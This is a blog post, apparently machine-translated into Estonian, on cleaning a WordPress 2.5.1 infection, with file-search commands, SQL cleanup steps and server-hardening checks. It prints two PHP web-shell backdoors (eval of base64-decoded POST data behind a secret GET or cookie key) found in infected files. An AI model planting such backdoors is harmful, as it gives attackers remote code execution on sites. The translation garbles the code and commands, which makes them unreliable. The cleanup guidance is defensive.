WordPress Exploit – puhastage viirusfailid, SQL ja serveri turvalisus.

Enne loe see postitus, siis peaks näha lisada siin, Mõista midagi. :)

Leidsin selle mitmest ajaveebifailist aadressil stealthsettings.com, allpool toodutega sarnased koodid, mis ilmnesid viirusnakkuse tagajärjel feat of WordPress.:

<?php if($_GET[‘573abcb060974771’]==”8e96d1b4b674e1d2″){ eval(base64_decode($_POST[‘file'])); väljumine; }?>

si

<?php if($_COOKIE[’44e827f9fbeca184′]==”5cd3c94b4b1c57ea”){ eval(base64_decode($_POST[‘file'])); väljumine; }?>

xmlrpcEespool puhul on faili xmlrpc.php pärit unineAga kell grep server, näeb päris palju koodid sedalaadi allikatest.

pppffiuuu

Puhastus nakatunud failid:

Ooookkkk ...
1. Parim lahendus, pärast seda teha backupCPC ja puhastada andmebaasis on eemaldama faile WordPress (pärast hoolikat kontrollimist saate hoida faili wp-config.php ja faile, mis pole rangelt seotud wp-platvormiga) serverisse ja laadida algsed versioonist 2.5.1 (Seekord teha upgrade versiooni wp :)) http://wordpress.org/download/ . Kustuta failid sealhulgas teema, kui teil on usku, et võite vaadata neid hoolikalt.

On ilmne, et failid on mõjutanud ja teemad, mida ei ole kasutatud enne blogis ja lihtsalt muutuvad teema, ei saa seda probleemi lahendada.

./andreea/wp-content/themes/default/index.php:<?php if($_COOKIE[’44e827f9fbeca184′]==”5cd3c94b4b1c57ea”){ eval(base64_decode($_POST[‘file'])); väljumine; }?>

2. Otsi ja kustutada kõik failid, mis sisaldavad: * _new.php, _old.php * * .jpgg, .giff * * .pngg ja faili wp-info.txt, kui üldse.

leidma. -nimi “* _new.php”
leidma. -nimi “* _old.php”
leidma. -nimi "* .jpgg"
leidma. -nimi “* _giff”
leidma. -nimi “* _pngg”
leidma. -nimi "wp-info.txt"

3. sisse / tmp Otsingu- ja kustutada nagu tmpYwbzT2

puhastamise SQL :

1. tabelis tabelis wp_options näha, kas kustutada read: internal_links_cache, rss_f541b3abd05e7962fcab37737f40fad8 si wordpress_options.

2. Kõik failis wp_options, minema active_plugins ja kustutada, kui on olemas plugin, mis lõpeb üks laiendiga * _new.php * _old.php, *. jpgg, *. GIFF, *. pngg või kui teine ​​laiendus kahtlusel hoolikalt kontrollima.

3. Tabelis wp_usersVaata, kui on kasutaja, kes ei ole kirjutatud midagi tema õigus, veerg user_nicename. Kustutage see kasutaja, kuid pidage meeles ID veerus olevat numbrit. See kasutaja kasutab tõenäoliselt "WordPress"Ca USER_LOGIN on loodud ja ilmub 00: 00: 00 0000-00-00.

4. Mine tabel wp_usermeta ja kustutada kõik read kuuluvad ID eespool.

Kui olete selle sql-i puhastuse teinud, keelake ja aktiveerige kõik pistikprogrammid. (ajaveebis -> Armatuurlaud -> pistikprogrammid)

Secure server:

1. Vaata, mida kataloogid ja failid "kirjutatav"(Chmod 777) ja proovige panna neid chmod mis ei võimalda nende kirjutamise igal tasandil. (Chmod 644, näiteks)

Otsi. -Perm-2-LS

2. Vaata, millised failid on bitt suid või SGID . Kui sa ei kasuta neid faile panna neid chmod 0 või eemaldada pakett, mida see sisaldab. Nad on väga ohtlikud, sest nad täitma privileege "rühm"Või"juur"Mitte tavaline kasutaja privileegid täita selle faili.

leida /-type f-perm-04000-LS
leida /-type f-perm-02000-LS

3. Vaata, mida sadamad on avatud ja proovite sulgeda või kinnitada need, mida ei kasutata.

netstat-| grep-i kuulata

Nii palju. Näen Mõned blogid on keelatud Google Search ja teised ütlevad: "Noh nad tegid!". Noh hästi olete teinud ... aga sa tead, kui Google hakkab keelata kõik alad vormimine  On rämpspost ja pane troojalaste (Trojan.Clicker.HTML) küpsistes?

Kirglik tehnoloogia vastu, mulle meeldib testida ja kirjutada õpetusi opsüsteemide kohta macOS, Linux Windows, umbes WordPress, WooCommerce ja seadistada LEMP veebiservereid (Linux, NGINX, MySQL ja PHP). kirjutan edasi StealthSettings.com alates 2006. aastast ja paar aastat hiljem hakkasin kirjutama iHowTo.Tipsi õpetustes ja uudistes ökosüsteemi seadmete kohta Apple: iPhone, iPad, Apple Vaata, HomePod, iMac, MacBook, AirPodid ja tarvikud.

1 mõte teemalWordPress Exploit – puhastage viirusfailid, SQL ja serveri turvalisus.

Jäta kommentaar